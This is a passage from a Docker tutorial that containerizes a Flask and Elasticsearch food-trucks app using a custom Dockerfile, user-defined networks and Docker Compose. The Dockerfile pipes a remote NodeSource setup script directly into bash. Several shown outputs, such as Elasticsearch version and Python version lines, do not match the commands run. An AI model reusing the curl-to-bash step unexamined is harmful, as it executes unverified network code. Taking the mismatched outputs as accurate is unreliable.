Now that you're excited (hopefully), let's think of how we can Dockerize the app. We can see that the application consists of a Flask backend server and an Elasticsearch service. A natural way to split this app would be to have two containers - one running the Flask process and another running the Elasticsearch (ES) process. That way if our app becomes popular, we can scale it by adding more containers depending on where the bottleneck lies.

Great, so we need two containers. That shouldn't be hard right? We've already built our own Flask container in the previous section. And for Elasticsearch, let's see if we can find something on the hub.

$ docker search elasticsearch
NAME                              DESCRIPTION                                     STARS     OFFICIAL   AUTOMATED
elasticsearch                     Elasticsearch is a powerful open source se...   697       [OK]
itzg/elasticsearch                Provides an easily configurable Elasticsea...   17                   [OK]
tutum/elasticsearch               Elasticsearch image - listens in port 9200.     15                   [OK]
barnybug/elasticsearch            Latest Elasticsearch 1.7.2 and previous re...   15                   [OK]
digitalwonderland/elasticsearch   Latest Elasticsearch with Marvel & Kibana       12                   [OK]
monsantoco/elasticsearch          ElasticSearch Docker image                      9                    [OK]

Quite unsurprisingly, there exists an officially supported image for Elasticsearch. To get ES running, we can simply use docker run and have a single-node ES container running locally within no time.

Note: Elastic, the company behind Elasticsearch, maintains its own registry for Elastic products. It's recommended to use the images from that registry if you plan to use Elasticsearch.

Let's first pull the image

$ docker pull docker.elastic.co/elasticsearch/elasticsearch:6.3.2

and then run it in development mode by specifying ports and setting an environment variable that configures the Elasticsearch cluster to run as a single-node.

$ docker run -d --name es -p 9200:9200 -p 9300:9300 -e "discovery.type=single-node" docker.elastic.co/elasticsearch/elasticsearch:6.3.2
277451c15ec183dd939e80298ea4bcf55050328a39b04124b387d668e3ed3943

Note: If your container runs into memory issues, you might need to tweak some JVM flags to limit its memory consumption.

As seen above, we use --name es to give our container a name which makes it easy to use in subsequent commands. Once the container is started, we can see the logs by running docker container logs with the container name (or ID) to inspect the logs. You should see logs similar to below if Elasticsearch started successfully.

Note: Elasticsearch takes a few seconds to start so you might need to wait before you see initialized in the logs.

$ docker container ls
CONTAINER ID        IMAGE                                                 COMMAND                  CREATED             STATUS              PORTS                                            NAMES
277451c15ec1        docker.elastic.co/elasticsearch/elasticsearch:6.3.2   "/usr/local/bin/dock…"   2 minutes ago       Up 2 minutes        0.0.0.0:9200->9200/tcp, 0.0.0.0:9300->9300/tcp   es

$ docker container logs es
[2018-07-29T05:49:09,304][INFO ][o.e.n.Node               ] [] initializing ...
[2018-07-29T05:49:09,385][INFO ][o.e.e.NodeEnvironment    ] [L1VMyzt] using [1] data paths, mounts [[/ (overlay)]], net usable_space [54.1gb], net total_space [62.7gb], types [overlay]
[2018-07-29T05:49:09,385][INFO ][o.e.e.NodeEnvironment    ] [L1VMyzt] heap size [990.7mb], compressed ordinary object pointers [true]
[2018-07-29T05:49:11,979][INFO ][o.e.p.PluginsService     ] [L1VMyzt] loaded module [x-pack-security]
[2018-07-29T05:49:11,980][INFO ][o.e.p.PluginsService     ] [L1VMyzt] loaded module [x-pack-sql]
[2018-07-29T05:49:11,980][INFO ][o.e.p.PluginsService     ] [L1VMyzt] loaded module [x-pack-upgrade]
[2018-07-29T05:49:11,980][INFO ][o.e.p.PluginsService     ] [L1VMyzt] loaded module [x-pack-watcher]
[2018-07-29T05:49:11,981][INFO ][o.e.p.PluginsService     ] [L1VMyzt] loaded plugin [ingest-geoip]
[2018-07-29T05:49:11,981][INFO ][o.e.p.PluginsService     ] [L1VMyzt] loaded plugin [ingest-user-agent]
[2018-07-29T05:49:17,659][INFO ][o.e.d.DiscoveryModule    ] [L1VMyzt] using discovery type [single-node]
[2018-07-29T05:49:18,962][INFO ][o.e.n.Node               ] [L1VMyzt] initialized
[2018-07-29T05:49:18,963][INFO ][o.e.n.Node               ] [L1VMyzt] starting ...
[2018-07-29T05:49:19,218][INFO ][o.e.t.TransportService   ] [L1VMyzt] publish_address {172.17.0.2:9300}, bound_addresses {0.0.0.0:9300}
[2018-07-29T05:49:19,302][INFO ][o.e.x.s.t.n.SecurityNetty4HttpServerTransport] [L1VMyzt] publish_address {172.17.0.2:9200}, bound_addresses {0.0.0.0:9200}
[2018-07-29T05:49:19,303][INFO ][o.e.n.Node               ] [L1VMyzt] started
[2018-07-29T05:49:19,439][WARN ][o.e.x.s.a.s.m.NativeRoleMappingStore] [L1VMyzt] Failed to clear cache for realms [[]]
[2018-07-29T05:49:19,542][INFO ][o.e.g.GatewayService     ] [L1VMyzt] recovered [0] indices into cluster_state

Now, lets try to see if can send a request to the Elasticsearch container. We use the 9200 port to send a cURL request to the container.

$ curl 0.0.0.0:9200
{
  "name" : "ijJDAOm",
  "cluster_name" : "docker-cluster",
  "cluster_uuid" : "a_nSV3XmTCqpzYYzb-LhNw",
  "version" : {
    "number" : "6.3.2",
    "build_flavor" : "default",
    "build_type" : "tar",
    "build_hash" : "053779d",
    "build_date" : "2018-07-20T05:20:23.451332Z",
    "build_snapshot" : false,
    "lucene_version" : "7.3.1",
    "minimum_wire_compatibility_version" : "5.6.0",
    "minimum_index_compatibility_version" : "5.0.0"
  },
  "tagline" : "You Know, for Search"
}

Sweet! It's looking good! While we are at it, let's get our Flask container running too. But before we get to that, we need a Dockerfile. In the last section, we used python:3.8 image as our base image. This time, however, apart from installing Python dependencies via pip, we want our application to also generate our minified Javascript file for production. For this, we'll require Nodejs. Since we need a custom build step, we'll start from the ubuntu base image to build our Dockerfile from scratch.

Note: if you find that an existing image doesn't cater to your needs, feel free to start from another base image and tweak it yourself. For most of the images on Docker Hub, you should be able to find the corresponding Dockerfile on Github. Reading through existing Dockerfiles is one of the best ways to learn how to roll your own.

Our Dockerfile for the flask app looks like below -

# start from base
FROM ubuntu:18.04

MAINTAINER Prakhar Srivastav <prakhar@prakhar.me>

# install system-wide deps for python and node
RUN apt-get -yqq update
RUN apt-get -yqq install python3-pip python3-dev curl gnupg
RUN curl -sL https://deb.nodesource.com/setup_10.x | bash
RUN apt-get install -yq nodejs

# copy our application code
ADD flask-app /opt/flask-app
WORKDIR /opt/flask-app

# fetch app specific deps
RUN npm install
RUN npm run build
RUN pip3 install -r requirements.txt

# expose port
EXPOSE 5000

# start app
CMD [ "python3", "./app.py" ]

Quite a few new things here so let's quickly go over this file. We start off with the Ubuntu LTS base image and use the package manager apt-get to install the dependencies namely - Python and Node. The yqq flag is used to suppress output and assumes "Yes" to all prompts.

We then use the ADD command to copy our application into a new volume in the container - /opt/flask-app. This is where our code will reside. We also set this as our working directory, so that the following commands will be run in the context of this location. Now that our system-wide dependencies are installed, we get around to installing app-specific ones. First off we tackle Node by installing the packages from npm and running the build command as defined in our package.json file. We finish the file off by installing the Python packages, exposing the port and defining the CMD to run as we did in the last section.

Finally, we can go ahead, build the image and run the container (replace yourusername with your username below).

$ docker build -t yourusername/foodtrucks-web .

In the first run, this will take some time as the Docker client will download the ubuntu image, run all the commands and prepare your image. Re-running docker build after any subsequent changes you make to the application code will almost be instantaneous. Now let's try running our app.

$ docker run -P --rm yourusername/foodtrucks-web
Unable to connect to ES. Retying in 5 secs...
Unable to connect to ES. Retying in 5 secs...
Unable to connect to ES. Retying in 5 secs...
Out of retries. Bailing out...

Oops! Our flask app was unable to run since it was unable to connect to Elasticsearch. How do we tell one container about the other container and get them to talk to each other? The answer lies in the next section.

Docker Network

Before we talk about the features Docker provides especially to deal with such scenarios, let's see if we can figure out a way to get around the problem. Hopefully, this should give you an appreciation for the specific feature that we are going to study.

Okay, so let's run docker container ls (which is same as docker ps) and see what we have.

$ docker container ls
CONTAINER ID        IMAGE                                                 COMMAND                  CREATED             STATUS              PORTS                                            NAMES
277451c15ec1        docker.elastic.co/elasticsearch/elasticsearch:6.3.2   "/usr/local/bin/dock…"   17 minutes ago      Up 17 minutes       0.0.0.0:9200->9200/tcp, 0.0.0.0:9300->9300/tcp   es

So we have one ES container running on 0.0.0.0:9200 port which we can directly access. If we can tell our Flask app to connect to this URL, it should be able to connect and talk to ES, right? Let's dig into our Python code and see how the connection details are defined.

es = Elasticsearch(host='es')

To make this work, we need to tell the Flask container that the ES container is running on 0.0.0.0 host (the port by default is 9200) and that should make it work, right? Unfortunately, that is not correct since the IP 0.0.0.0 is the IP to access ES container from the host machine i.e. from my Mac. Another container will not be able to access this on the same IP address. Okay if not that IP, then which IP address should the ES container be accessible by? I'm glad you asked this question.

Now is a good time to start our exploration of networking in Docker. When docker is installed, it creates three networks automatically.

$ docker network ls
NETWORK ID          NAME                DRIVER              SCOPE
c2c695315b3a        bridge              bridge              local
a875bec5d6fd        host                host                local
ead0e804a67b        none                null                local

The bridge network is the network in which containers are run by default. So that means that when I ran the ES container, it was running in this bridge network. To validate this, let's inspect the network.

$ docker network inspect bridge
[
    {
        "Name": "bridge",
        "Id": "c2c695315b3aaf8fc30530bb3c6b8f6692cedd5cc7579663f0550dfdd21c9a26",
        "Created": "2018-07-28T20:32:39.405687265Z",
        "Scope": "local",
        "Driver": "bridge",
        "EnableIPv6": false,
        "IPAM": {
            "Driver": "default",
            "Options": null,
            "Config": [
                {
                    "Subnet": "172.17.0.0/16",
                    "Gateway": "172.17.0.1"
                }
            ]
        },
        "Internal": false,
        "Attachable": false,
        "Ingress": false,
        "ConfigFrom": {
            "Network": ""
        },
        "ConfigOnly": false,
        "Containers": {
            "277451c15ec183dd939e80298ea4bcf55050328a39b04124b387d668e3ed3943": {
                "Name": "es",
                "EndpointID": "5c417a2fc6b13d8ec97b76bbd54aaf3ee2d48f328c3f7279ee335174fbb4d6bb",
                "MacAddress": "02:42:ac:11:00:02",
                "IPv4Address": "172.17.0.2/16",
                "IPv6Address": ""
            }
        },
        "Options": {
            "com.docker.network.bridge.default_bridge": "true",
            "com.docker.network.bridge.enable_icc": "true",
            "com.docker.network.bridge.enable_ip_masquerade": "true",
            "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0",
            "com.docker.network.bridge.name": "docker0",
            "com.docker.network.driver.mtu": "1500"
        },
        "Labels": {}
    }
]

You can see that our container 277451c15ec1 is listed under the Containers section in the output. What we also see is the IP address this container has been allotted - 172.17.0.2. Is this the IP address that we're looking for? Let's find out by running our flask container and trying to access this IP.

$ docker run -it --rm yourusername/foodtrucks-web bash
root@35180ccc206a:/opt/flask-app# curl 172.17.0.2:9200
{
  "name" : "Jane Foster",
  "cluster_name" : "elasticsearch",
  "version" : {
    "number" : "2.1.1",
    "build_hash" : "40e2c53a6b6c2972b3d13846e450e66f4375bd71",
    "build_timestamp" : "2015-12-15T13:05:55Z",
    "build_snapshot" : false,
    "lucene_version" : "5.3.1"
  },
  "tagline" : "You Know, for Search"
}
root@35180ccc206a:/opt/flask-app# exit

This should be fairly straightforward to you by now. We start the container in the interactive mode with the bash process. The --rm is a convenient flag for running one off commands since the container gets cleaned up when its work is done. We try a curl but we need to install it first. Once we do that, we see that we can indeed talk to ES on 172.17.0.2:9200. Awesome!

Although we have figured out a way to make the containers talk to each other, there are still two problems with this approach -

How do we tell the Flask container that es hostname stands for 172.17.0.2 or some other IP since the IP can change?
Since the bridge network is shared by every container by default, this method is not secure. How do we isolate our network?

The good news that Docker has a great answer to our questions. It allows us to define our own networks while keeping them isolated using the docker network command.

Let's first go ahead and create our own network.

$ docker network create foodtrucks-net
0815b2a3bb7a6608e850d05553cc0bda98187c4528d94621438f31d97a6fea3c

$ docker network ls
NETWORK ID          NAME                DRIVER              SCOPE
c2c695315b3a        bridge              bridge              local
0815b2a3bb7a        foodtrucks-net      bridge              local
a875bec5d6fd        host                host                local
ead0e804a67b        none                null                local

The network create command creates a new bridge network, which is what we need at the moment. In terms of Docker, a bridge network uses a software bridge which allows containers connected to the same bridge network to communicate, while providing isolation from containers which are not connected to that bridge network. The Docker bridge driver automatically installs rules in the host machine so that containers on different bridge networks cannot communicate directly with each other. There are other kinds of networks that you can create, and you are encouraged to read about them in the official docs.

Now that we have a network, we can launch our containers inside this network using the --net flag. Let's do that - but first, in order to launch a new container with the same name, we will stop and remove our ES container that is running in the bridge (default) network.

$ docker container stop es
es

$ docker container rm es
es

$ docker run -d --name es --net foodtrucks-net -p 9200:9200 -p 9300:9300 -e "discovery.type=single-node" docker.elastic.co/elasticsearch/elasticsearch:6.3.2
13d6415f73c8d88bddb1f236f584b63dbaf2c3051f09863a3f1ba219edba3673

$ docker network inspect foodtrucks-net
[
    {
        "Name": "foodtrucks-net",
        "Id": "0815b2a3bb7a6608e850d05553cc0bda98187c4528d94621438f31d97a6fea3c",
        "Created": "2018-07-30T00:01:29.1500984Z",
        "Scope": "local",
        "Driver": "bridge",
        "EnableIPv6": false,
        "IPAM": {
            "Driver": "default",
            "Options": {},
            "Config": [
                {
                    "Subnet": "172.18.0.0/16",
                    "Gateway": "172.18.0.1"
                }
            ]
        },
        "Internal": false,
        "Attachable": false,
        "Ingress": false,
        "ConfigFrom": {
            "Network": ""
        },
        "ConfigOnly": false,
        "Containers": {
            "13d6415f73c8d88bddb1f236f584b63dbaf2c3051f09863a3f1ba219edba3673": {
                "Name": "es",
                "EndpointID": "29ba2d33f9713e57eb6b38db41d656e4ee2c53e4a2f7cf636bdca0ec59cd3aa7",
                "MacAddress": "02:42:ac:12:00:02",
                "IPv4Address": "172.18.0.2/16",
                "IPv6Address": ""
            }
        },
        "Options": {},
        "Labels": {}
    }
]

As you can see, our es container is now running inside the foodtrucks-net bridge network. Now let's inspect what happens when we launch in our foodtrucks-net network.

$ docker run -it --rm --net foodtrucks-net yourusername/foodtrucks-web bash
root@9d2722cf282c:/opt/flask-app# curl es:9200
{
  "name" : "wWALl9M",
  "cluster_name" : "docker-cluster",
  "cluster_uuid" : "BA36XuOiRPaghPNBLBHleQ",
  "version" : {
    "number" : "6.3.2",
    "build_flavor" : "default",
    "build_type" : "tar",
    "build_hash" : "053779d",
    "build_date" : "2018-07-20T05:20:23.451332Z",
    "build_snapshot" : false,
    "lucene_version" : "7.3.1",
    "minimum_wire_compatibility_version" : "5.6.0",
    "minimum_index_compatibility_version" : "5.0.0"
  },
  "tagline" : "You Know, for Search"
}
root@53af252b771a:/opt/flask-app# ls
app.py  node_modules  package.json  requirements.txt  static  templates  webpack.config.js
root@53af252b771a:/opt/flask-app# python3 app.py
Index not found...
Loading data in elasticsearch ...
Total trucks loaded:  733
 * Running on http://0.0.0.0:5000/ (Press CTRL+C to quit)
root@53af252b771a:/opt/flask-app# exit

Wohoo! That works! On user-defined networks like foodtrucks-net, containers can not only communicate by IP address, but can also resolve a container name to an IP address. This capability is called automatic service discovery. Great! Let's launch our Flask container for real now -

$ docker run -d --net foodtrucks-net -p 5000:5000 --name foodtrucks-web yourusername/foodtrucks-web
852fc74de2954bb72471b858dce64d764181dca0cf7693fed201d76da33df794

$ docker container ls
CONTAINER ID        IMAGE                                                 COMMAND                  CREATED              STATUS              PORTS                                            NAMES
852fc74de295        yourusername/foodtrucks-web                           "python3 ./app.py"       About a minute ago   Up About a minute   0.0.0.0:5000->5000/tcp                           foodtrucks-web
13d6415f73c8        docker.elastic.co/elasticsearch/elasticsearch:6.3.2   "/usr/local/bin/dock…"   17 minutes ago       Up 17 minutes       0.0.0.0:9200->9200/tcp, 0.0.0.0:9300->9300/tcp   es

$ curl -I 0.0.0.0:5000
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 3697
Server: Werkzeug/0.11.2 Python/2.7.6
Date: Sun, 10 Jan 2016 23:58:53 GMT

Head over to http://0.0.0.0:5000 and see your glorious app live! Although that might have seemed like a lot of work, we actually just typed 4 commands to go from zero to running. I've collated the commands in a bash script.

#!/bin/bash

# build the flask container
docker build -t yourusername/foodtrucks-web .

# create the network
docker network create foodtrucks-net

# start the ES container
docker run -d --name es --net foodtrucks-net -p 9200:9200 -p 9300:9300 -e "discovery.type=single-node" docker.elastic.co/elasticsearch/elasticsearch:6.3.2

# start the flask app container
docker run -d --net foodtrucks-net -p 5000:5000 --name foodtrucks-web yourusername/foodtrucks-web

Now imagine you are distributing your app to a friend, or running on a server that has docker installed. You can get a whole app running with just one command!

$ git clone https://github.com/prakhar1989/FoodTrucks
$ cd FoodTrucks
$ ./setup-docker.sh

And that's it! If you ask me, I find this to be an extremely awesome, and a powerful way of sharing and running your applications!

Docker Compose

Till now we've spent all our time exploring the Docker client. In the Docker ecosystem, however, there are a bunch of other open-source tools which play very nicely with Docker. A few of them are -

Docker Machine - Create Docker hosts on your computer, on cloud providers, and inside your own data center
Docker Compose - A tool for defining and running multi-container Docker applications.
Docker Swarm - A native clustering solution for Docker
Kubernetes - Kubernetes is an open-source system for automating deployment, scaling, and management of containerized applications.

In this section, we are going to look at one of these tools, Docker Compose, and see how it can make dealing with multi-container apps easier.

The background story of Docker Compose is quite interesting. Roughly around January 2014, a company called OrchardUp launched a tool called Fig. The idea behind Fig was to make isolated development environments work with Docker. The project was very well received on Hacker News - I oddly remember reading about it but didn't quite get the hang of it.

The first comment on the forum actually does a good job of explaining what Fig is all about.

So really at this point, that's what Docker is about: running processes. Now Docker offers a quite rich API to run the processes: shared volumes (directories) between containers (i.e. running images), forward port from the host to the container, display logs, and so on. But that's it: Docker as of now, remains at the process level.

While it provides options to orchestrate multiple containers to create a single "app", it doesn't address the management of such group of containers as a single entity. And that's where tools such as Fig come in: talking about a group of containers as a single entity. Think "run an app" (i.e. "run an orchestrated cluster of containers") instead of "run a container".

It turns out that a lot of people using docker agree with this sentiment. Slowly and steadily as Fig became popular, Docker Inc. took notice, acquired the company and re-branded Fig as Docker Compose.

So what is Compose used for? Compose is a tool that is used for defining and running multi-container Docker apps in an easy way. It provides a configuration file called docker-compose.yml that can be used to bring up an application and the suite of services it depends on with just one command. Compose works in all environments: production, staging, development, testing, as well as CI workflows, although Compose is ideal for development and testing environments.

Let's see if we can create a docker-compose.yml file for our SF-Foodtrucks app and evaluate whether Docker Compose lives up to its promise.

The first step, however, is to install Docker Compose. If you're running Windows or Mac, Docker Compose is already installed as it comes in the Docker Toolbox. Linux users can easily get their hands on Docker Compose by following the instructions on the docs. Since Compose is written in Python, you can also simply do pip install docker-compose. Test your installation with -

$ docker-compose --version
docker-compose version 1.21.2, build a133471

Now that we have it installed, we can jump on the next step i.e. the Docker Compose file docker-compose.yml. The syntax for YAML is quite simple and the repo already contains the docker-compose file that we'll be using.

version: "3"
services:
  es:
    image: docker.elastic.co/elasticsearch/elasticsearch:6.3.2
    container_name: es
    environment:
      - discovery.type=single-node
    ports:
      - 9200:9200
    volumes:
      - esdata1:/usr/share/elasticsearch/data
  web:
    image: yourusername/foodtrucks-web
    command: python3 app.py
    depends_on:
      - es
    ports:
      - 5000:5000
    volumes:
      - ./flask-app:/opt/flask-app
volumes:
  esdata1:
    driver: local

Let me breakdown what the file above means. At the parent level, we define the names of our services - es and web. The image parameter is always required, and for each service that we want Docker to run, we can add additional parameters. For es, we just refer to the elasticsearch image available on Elastic registry. For our Flask app, we refer to the image that we built at the beginning of this section.

Other parameters such as command and ports provide more information about the container. The volumes parameter specifies a mount point in our web container where the code will reside. This is purely optional and is useful if you need access to logs, etc. We'll later see how this can be useful during development. Refer to the online reference to learn more about the parameters this file supports. We also add volumes for the es container so that the data we load persists between restarts. We also specify depends_on, which tells docker to start the es container before web. You can read more about it on docker compose docs.

Note: You must be inside the directory with the docker-compose.yml file in order to execute most Compose commands.

Great! Now the file is ready, let's see docker-compose in action. But before we start, we need to make sure the ports and names are free. So if you have the Flask and ES containers running, lets turn them off.

$ docker stop es foodtrucks-web
es
foodtrucks-web

$ docker rm es foodtrucks-web
es
foodtrucks-web

Now we can run docker-compose. Navigate to the food trucks directory and run docker-compose up.

$ docker-compose up
Creating network "foodtrucks_default" with the default driver
Creating foodtrucks_es_1
Creating foodtrucks_web_1
Attaching to foodtrucks_es_1, foodtrucks_web_1
es_1  | [2016-01-11 03:43:50,300][INFO ][node                     ] [Comet] version[2.1.1], pid[1], build[40e2c53/2015-12-15T13:05:55Z]
es_1  | [2016-01-11 03:43:50,307][INFO ][node                     ] [Comet] initializing ...
es_1  | [2016-01-11 03:43:50,366][INFO ][plugins                  ] [Comet] loaded [], sites []
es_1  | [2016-01-11 03:43:50,421][INFO ][env                      ] [Comet] using [1] data paths, mounts [[/usr/share/elasticsearch/data (/dev/sda1)]], net usable_space [16gb], net total_space [18.1gb], spins? [possibly], types [ext4]
es_1  | [2016-01-11 03:43:52,626][INFO ][node                     ] [Comet] initialized
es_1  | [2016-01-11 03:43:52,632][INFO ][node                     ] [Comet] starting ...
es_1  | [2016-01-11 03:43:52,703][WARN ][common.network           ] [Comet] publish address: {0.0.0.0} is a wildcard address, falling back to first non-loopback: {172.17.0.2}
es_1  | [2016-01-11 03:43:52,704][INFO ][transport                ] [Comet] publish_address {172.17.0.2:9300}, bound_addresses {[::]:9300}
es_1  | [2016-01-11 03:43:52,721][INFO ][discovery                ] [Comet] elasticsearch/cEk4s7pdQ-evRc9MqS2wqw
es_1  | [2016-01-11 03:43:55,785][INFO ][cluster.service          ] [Comet] new_master {Comet}{cEk4s7pdQ-evRc9MqS2wqw}{172.17.0.2}{172.17.0.2:9300}, reason: zen-disco-join(elected_as_master, [0] joins received)
es_1  | [2016-01-11 03:43:55,818][WARN ][common.network           ] [Comet] publish address: {0.0.0.0} is a wildcard address, falling back to first non-loopback: {172.17.0.2}
es_1  | [2016-01-11 03:43:55,819][INFO ][http                     ] [Comet] publish_address {172.17.0.2:9200}, bound_addresses {[::]:9200}
es_1  | [2016-01-11 03:43:55,819][INFO ][node                     ] [Comet] started
es_1  | [2016-01-11 03:43:55,826][INFO ][gateway                  ] [Comet] recovered [0] indices into cluster_state
es_1  | [2016-01-11 03:44:01,825][INFO ][cluster.metadata         ] [Comet] [sfdata] creating index, cause [auto(index api)], templates [], shards [5]/[1], mappings [truck]
es_1  | [2016-01-11 03:44:02,373][INFO ][cluster.metadata         ] [Comet] [sfdata] update_mapping [truck]
es_1  | [2016-01-11 03:44:02,510][INFO ][cluster.metadata         ] [Comet] [sfdata] update_mapping [truck]
es_1  | [2016-01-11 03:44:02,593][INFO ][cluster.metadata         ] [Comet] [sfdata] update_mapping [truck]
es_1  | [2016-01-11 03:44:02,708][INFO ][cluster.metadata         ] [Comet] [sfdata] update_mapping [truck]
es_1  | [2016-01-11 03:44:03,047][INFO ][cluster.metadata         ] [Comet] [sfdata] update_mapping [truck]
web_1 |  * Running on http://0.0.0.0:5000/ (Press CTRL+C to quit)

Head over to the IP to see your app live. That was amazing wasn't it? Just a few lines of configuration and we have two Docker containers running successfully in unison. Let's stop the services and re-run in detached mode.

web_1 |  * Running on http://0.0.0.0:5000/ (Press CTRL+C to quit)
Killing foodtrucks_web_1 ... done
Killing foodtrucks_es_1 ... done

$ docker-compose up -d
Creating es               ... done
Creating foodtrucks_web_1 ... done

$ docker-compose ps
      Name                    Command               State                Ports
--------------------------------------------------------------------------------------------
es                 /usr/local/bin/docker-entr ...   Up      0.0.0.0:9200->9200/tcp, 9300/tcp
foodtrucks_web_1   python3 app.py                   Up      0.0.0.0:5000->5000/tcp

Unsurprisingly, we can see both containers running successfully. Where do the names come from? Those were created automatically by Compose. But does Compose also create the network automatically? Good question! Let's find out.

First off, let us stop the services from running. We can always bring them back up with just one command. Data volumes will persist, so it’s possible to start the cluster again with the same data using docker-compose up. To destroy the cluster and the data volumes, just type docker-compose down -v.

$ docker-compose down -v
Stopping foodtrucks_web_1 ... done
Stopping es               ... done
Removing foodtrucks_web_1 ... done
Removing es               ... done
Removing network foodtrucks_default
Removing volume foodtrucks_esdata1

While we're are at it, we'll also remove the foodtrucks network that we created last time.

$ docker network rm foodtrucks-net
$ docker network ls
NETWORK ID          NAME                 DRIVER              SCOPE
c2c695315b3a        bridge               bridge              local
a875bec5d6fd        host                 host                local
ead0e804a67b        none                 null                local

Great! Now that we have a clean slate, let's re-run our services and see if Compose does its magic.

$ docker-compose up -d
Recreating foodtrucks_es_1
Recreating foodtrucks_web_1

$ docker container ls
CONTAINER ID        IMAGE                        COMMAND                  CREATED             STATUS              PORTS                    NAMES
f50bb33a3242        yourusername/foodtrucks-web  "python3 app.py"         14 seconds ago      Up 13 seconds       0.0.0.0:5000->5000/tcp   foodtrucks_web_1
e299ceeb4caa        elasticsearch                "/docker-entrypoint.s"   14 seconds ago      Up 14 seconds       9200/tcp, 9300/tcp       foodtrucks_es_1

So far, so good. Time to see if any networks were created.

$ docker network ls
NETWORK ID          NAME                 DRIVER
c2c695315b3a        bridge               bridge              local
f3b80f381ed3        foodtrucks_default   bridge              local
a875bec5d6fd        host                 host                local
ead0e804a67b        none                 null                local

You can see that compose went ahead and created a new network called foodtrucks_default and attached both the new services in that network so that each of these are discoverable to the other. Each container for a service joins the default network and is both reachable by other containers on that network, and discoverable by them at a hostname identical to the container name.

$ docker ps
CONTAINER ID        IMAGE                                                 COMMAND                  CREATED              STATUS              PORTS                              NAMES
8c6bb7e818ec        docker.elastic.co/elasticsearch/elasticsearch:6.3.2   "/usr/local/bin/dock…"   About a minute ago   Up About a minute   0.0.0.0:9200->9200/tcp, 9300/tcp   es
7640cec7feb7        yourusername/foodtrucks-web                           "python3 app.py"         About a minute ago   Up About a minute   0.0.0.0:5000->5000/tcp             foodtrucks_web_1

$ docker network inspect foodtrucks_default
[
    {
        "Name": "foodtrucks_default",
        "Id": "f3b80f381ed3e03b3d5e605e42c4a576e32d38ba24399e963d7dad848b3b4fe7",
        "Created": "2018-07-30T03:36:06.0384826Z",
        "Scope": "local",
        "Driver": "bridge",
        "EnableIPv6": false,
        "IPAM": {
            "Driver": "default",
            "Options": null,
            "Config": [
                {
                    "Subnet": "172.19.0.0/16",
                    "Gateway": "172.19.0.1"
                }
            ]
        },
        "Internal": false,
        "Attachable": true,
        "Ingress": false,
        "ConfigFrom": {
            "Network": ""
        },
        "ConfigOnly": false,
        "Containers": {
            "7640cec7feb7f5615eaac376271a93fb8bab2ce54c7257256bf16716e05c65a5": {
                "Name": "foodtrucks_web_1",
                "EndpointID": "b1aa3e735402abafea3edfbba605eb4617f81d94f1b5f8fcc566a874660a0266",
                "MacAddress": "02:42:ac:13:00:02",
                "IPv4Address": "172.19.0.2/16",
                "IPv6Address": ""
            },
            "8c6bb7e818ec1f88c37f375c18f00beb030b31f4b10aee5a0952aad753314b57": {
                "Name": "es",
                "EndpointID": "649b3567d38e5e6f03fa6c004a4302508c14a5f2ac086ee6dcf13ddef936de7b",
                "MacAddress": "02:42:ac:13:00:03",
                "IPv4Address": "172.19.0.3/16",
                "IPv6Address": ""
            }
        },
        "Options": {},
        "Labels": {
            "com.docker.compose.network": "default",
            "com.docker.compose.project": "foodtrucks",
            "com.docker.compose.version": "1.21.2"
        }
    }
]

Development Workflow

Before we jump to the next section, there's one last thing I wanted to cover about docker-compose. As stated earlier, docker-compose is really great for development and testing. So let's see how we can configure compose to make our lives easier during development.

Throughout this tutorial, we've worked with readymade docker images. While we've built images from scratch, we haven't touched any application code yet and mostly restricted ourselves to editing Dockerfiles and YAML configurations. One thing that you must be wondering is how does the workflow look during development? Is one supposed to keep creating Docker images for every change, then publish it and then run it to see if the changes work as expected? I'm sure that sounds super tedious. There has to be a better way. In this section, that's what we're going to explore.

Let's see how we can make a change in the Foodtrucks app we just ran. Make sure you have the app running,

$ docker container ls
CONTAINER ID        IMAGE                                                 COMMAND                  CREATED             STATUS              PORTS                              NAMES
5450ebedd03c        yourusername/foodtrucks-web                           "python3 app.py"         9 seconds ago       Up 6 seconds        0.0.0.0:5000->5000/tcp             foodtrucks_web_1
05d408b25dfe        docker.elastic.co/elasticsearch/elasticsearch:6.3.2   "/usr/local/bin/dock…"   10 hours ago        Up 10 hours         0.0.0.0:9200->9200/tcp, 9300/tcp   es

Now let's see if we can change this app to display a Hello world! message when a request is made to /hello route. Currently, the app responds with a 404.

$ curl -I 0.0.0.0:5000/hello
HTTP/1.0 404 NOT FOUND
Content-Type: text/html
Content-Length: 233
Server: Werkzeug/0.11.2 Python/2.7.15rc1
Date: Mon, 30 Jul 2018 15:34:38 GMT

Why does this happen? Since ours is a Flask app, we can see app.py (link) for answers. In Flask, routes are defined with @app.route syntax. In the file, you'll see that we only have three routes defined - /,/debugand/search. The/route renders the main app, thedebugroute is used to return some debug information and finallysearch is used by the app to query elasticsearch.

$ curl 0.0.0.0:5000/debug
{
  "msg": "yellow open sfdata Ibkx7WYjSt-g8NZXOEtTMg 5 1 618 0 1.3mb 1.3mb\n",
  "status": "success"
}

Given that context, how would we add a new route for hello? You guessed it! Let's open flask-app/app.py in our favorite editor and make the following change

@app.route('/')
def index():
  return render_template("index.html")

# add a new hello route
@app.route('/hello')
def hello():
  return "hello world!"

Now let's try making a request again

$ curl -I 0.0.0.0:5000/hello
HTTP/1.0 404 NOT FOUND
Content-Type: text/html
Content-Length: 233
Server: Werkzeug/0.11.2 Python/2.7.15rc1
Date: Mon, 30 Jul 2018 15:34:38 GMT

Oh no! That didn't work! What did we do wrong? While we did make the change in app.py, the file resides in our machine (or the host machine), but since Docker is running our containers based off the yourusername/foodtrucks-web image, it doesn't know about this change. To validate this, lets try the following -

$ docker-compose run web bash
Starting es ... done
root@581e351c82b0:/opt/flask-app# ls
app.py        package-lock.json  requirements.txt  templates
node_modules  package.json       static            webpack.config.js
root@581e351c82b0:/opt/flask-app# grep hello app.py
root@581e351c82b0:/opt/flask-app# exit

What we're trying to do here is to validate that our changes are not in the app.py that's running in the container. We do this by running the command docker-compose run, which is similar to its cousin docker run but takes additional arguments for the service (which is web in our case). As soon as we run bash, the shell opens in /opt/flask-app as specified in our Dockerfile. From the grep command we can see that our changes are not in the file.

Lets see how we can fix it. First off, we need to tell docker compose to not use the image and instead use the files locally. We'll also set debug mode to true so that Flask knows to reload the server when app.py changes. Replace the web portion of the docker-compose.yml file like so:

version: "3"
services:
  es:
    image: docker.elastic.co/elasticsearch/elasticsearch:6.3.2
    container_name: es
    environment:
      - discovery.type=single-node
    ports:
      - 9200:9200
    volumes:
